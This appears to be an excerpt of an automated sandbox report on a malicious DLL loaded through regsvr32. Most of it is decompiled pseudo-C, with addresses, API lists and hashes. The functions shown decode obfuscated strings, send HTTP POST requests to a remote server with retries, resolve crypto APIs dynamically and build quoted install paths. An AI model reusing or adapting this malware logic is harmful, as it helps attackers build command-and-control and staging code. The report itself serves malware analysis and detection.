                    • Part of subcall function 1000D523: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
                    • Part of subcall function 1000D523: CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
                    • Part of subcall function 1000D523: SysAllocString.OLEAUT32(00000000), ref: 1000D569
                    • Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594
                    • Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612
                  • SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
                  • SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
                  • SysFreeString.OLEAUT32(?), ref: 1000DF82
                  • SysFreeString.OLEAUT32(?), ref: 1000DF8B
                    • Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
                  • String ID: FALSE$TRUE
                  • API String ID: 224402418-1412513891
                  • Opcode ID: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
                  • Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
                  • Opcode Fuzzy Hash: 5d92cc2ce36c8b73f617da86ff32e213aea554078eedf743720070c244731c5e
                  • Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305COMMON
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}



































































                  0x1000e671
                  0x1000e683
                  0x1000e68c
                  0x1000e696
                  0x1000e69a
                  0x1000e6ab
                  0x1000e6c2
                  0x1000e6cf
                  0x1000e6dc
                  0x1000e6e9
                  0x1000e6ec
                  0x1000e6f1
                  0x1000e6f6
                  0x1000e6f8
                  0x1000e700
                  0x1000e70b
                  0x1000e712
                  0x1000e71e
                  0x1000e721
                  0x1000e72f
                  0x1000e732
                  0x1000e738
                  0x1000e739
                  0x1000e73b
                  0x1000e744
                  0x1000e745
                  0x1000e74a
                  0x1000e750
                  0x1000e75a
                  0x1000e75c
                  0x1000e761
                  0x1000e761
                  0x1000e770
                  0x1000e77f
                  0x1000e783
                  0x1000e792
                  0x1000e795
                  0x1000e79a
                  0x1000e79e
                  0x1000e7a5
                  0x1000e7ac
                  0x1000e7b4
                  0x1000e7bc
                  0x1000e7c3
                  0x1000e7cb
                  0x1000e7d3
                  0x1000e7da
                  0x1000e7e2
                  0x1000e7ea
                  0x1000e7ff
                  0x1000e80c
                  0x1000e80e
                  0x1000e813
                  0x1000e813
                  0x1000e81a
                  0x1000e82b
                  0x1000e830
                  0x1000e832
                  0x1000e832
                  0x1000e846
                  0x1000e858
                  0x1000e85a
                  0x1000e85d
                  0x1000e862
                  0x1000e862
                  0x1000e869
                  0x1000e878
                  0x1000e87c
                  0x1000e8ba
                  0x1000e8bf
                  0x1000e8c7
                  0x1000e8cc
                  0x1000e8d7
                  0x1000e8dd
                  0x1000e8e7
                  0x1000e8ea
                  0x1000e8f3
                  0x1000e8f8
                  0x1000e8f8
                  0x1000e901
                  0x1000e94a
                  0x1000e94c
                  0x1000e953
                  0x1000e954
                  0x1000e957
                  0x1000e95d
                  0x1000e961
                  0x1000e962
                  0x1000e967
                  0x1000e969
                  0x1000e96f
                  0x1000e984
                  0x1000e98c
                  0x1000e9c1
                  0x1000e9c6
                  0x1000e9cb
                  0x00000000
                  0x1000e9cd
                  0x1000e98e
                  0x1000e990
                  0x1000e990
                  0x1000e999
                  0x1000e99c
                  0x1000e99e
                  0x1000e9a0
                  0x1000e9a6
                  0x1000e9a6
                  0x1000e9ab
                  0x1000e9ad
                  0x1000e9b4
                  0x1000e9b4
                  0x00000000
                  0x1000e9b7
                  0x1000e971
                  0x1000e979
                  0x00000000
                  0x1000e903
                  0x1000e903
                  0x1000e909
                  0x1000e90f
                  0x1000e912
                  0x00000000
                  0x1000e912
                  0x1000e901
                  0x1000e87e
                  0x1000e884
                  0x1000e888
                  0x1000e889
                  0x1000e88e
                  0x1000e890
                  0x1000e896
                  0x1000e8b4
                  0x1000e8b4
                  0x00000000
                  0x1000e8b4
                  0x1000e898
                  0x1000e8a2
                  0x1000e8a4
                  0x1000e8a5
                  0x1000e8aa
                  0x1000e8ac
                  0x1000e8b2
                  0x00000000
                  0x00000000
                  0x00000000
                  0x1000e86b
                  0x1000e86b
                  0x1000e914
                  0x1000e914
                  0x1000e91a
                  0x1000e91d
                  0x00000000
                  0x1000e91d
                  0x1000e81c
                  0x1000e81c
                  0x1000e91f
                  0x1000e91f
                  0x1000e925
                  0x1000e928
                  0x00000000
                  0x1000e928
                  0x1000e81a
                  0x1000e785
                  0x1000e92a
                  0x1000e92d
                  0x1000e92f
                  0x1000e932
                  0x1000e935
                  0x1000e93e
                  0x1000e943
                  0x00000000
                  0x00000000
                  0x1000e947
                  0x00000000
                  0x1000e947
                  0x1000e754
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: memset$ErrorLast
                  • String ID: POST
                  • API String ID: 2570506013-1814004025
                  • Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                  • Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
                  • Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
                  • Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 28%
                  			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}















                  0x100116c1
                  0x100116c8
                  0x100116d1
                  0x100116d5
                  0x10011750
                  0x00000000
                  0x10011752
                  0x100116e3
                  0x100116e5
                  0x100116ea
                  0x00000000
                  0x00000000
                  0x100116f2
                  0x100116f4
                  0x100116f9
                  0x00000000
                  0x00000000
                  0x10011703
                  0x10011707
                  0x00000000
                  0x00000000
                  0x10011709
                  0x1001170e
                  0x10011710
                  0x10011711
                  0x10011715
                  0x1001171b
                  0x00000000
                  0x00000000
                  0x10011726
                  0x1001172f
                  0x10011733
                  0x00000000
                  0x00000000
                  0x10011735
                  0x10011737
                  0x1001173f
                  0x10011741
                  0x10011742
                  0x1001174a
                  0x00000000

                  APIs
                  • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
                  • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
                  • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
                  • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: AddressProc$HandleModule
                  • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                  • API String ID: 667068680-129414566
                  • Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                  • Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
                  • Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
                  • Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}














                  0x10012125
                  0x1001212a
                  0x1001212e
                  0x1001212e
                  0x10012133
                  0x10012138
                  0x10012139
                  0x1001213c
                  0x1001213d
                  0x10012142
                  0x10012145
                  0x10012146
                  0x1001214b
                  0x10012152
                  0x100121f8
                  0x100121f8
                  0x00000000
                  0x10012161
                  0x10012161
                  0x10012168
                  0x1001216c
                  0x10012173
                  0x1001217c
                  0x1001217e
                  0x1001217e
                  0x1001217c
                  0x1001218d
                  0x100121b3
                  0x100121bc
                  0x100121be
                  0x100121c4
                  0x100121f3
                  0x100121f3
                  0x100121fb
                  0x100121fe
                  0x100121fe
                  0x100121c6
                  0x100121c7
                  0x100121cd
                  0x100121cf
                  0x100121cf
                  0x100121d4
                  0x100121d3
                  0x100121d3
                  0x100121db
                  0x100121e7
                  0x100121f1
                  0x100121f1
                  0x00000000
                  0x1001219d
                  0x1001219d
                  0x1001219d
                  0x100121a3
                  0x00000000
                  0x00000000
                  0x100121a5
                  0x100121ab
                  0x100121b0
                  0x00000000
                  0x100121b0
                  0x1001218d

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: strchr$_snprintflocaleconv
                  • String ID: %.*g
                  • API String ID: 1910550357-952554281
                  • Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                  • Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
                  • Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
                  • Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.497736251.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000005.00000002.497731437.0000000010000000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497749205.0000000010018000.00000002.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497757016.000000001001D000.00000004.00020000.sdmp Download File
                  • Associated: 00000005.00000002.497762389.000000001001F000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_10000000_regsvr32.jbxd
                  Similarity
                  • API ID: _snprintfqsort
                  • String ID: %I64d$false$null$true
                  • API String ID: 756996078-4285102228
                  • Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                  • Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
                  • Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
                  • Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 80%
                  			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x2bb0590
					_t3 = _t123 + 0x110; // 0x2c2fd98
					_t125 =  *0x1001e68c; // 0x2c2fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *_t3)));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x2bb0590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x2bb0590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x2bb0590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x2bb0590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x2bb07b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x2bb0590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x2c2faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x2c2faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t17 = _t75 + 0x1898; // 0x0
						_t116 =  *_t17;
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
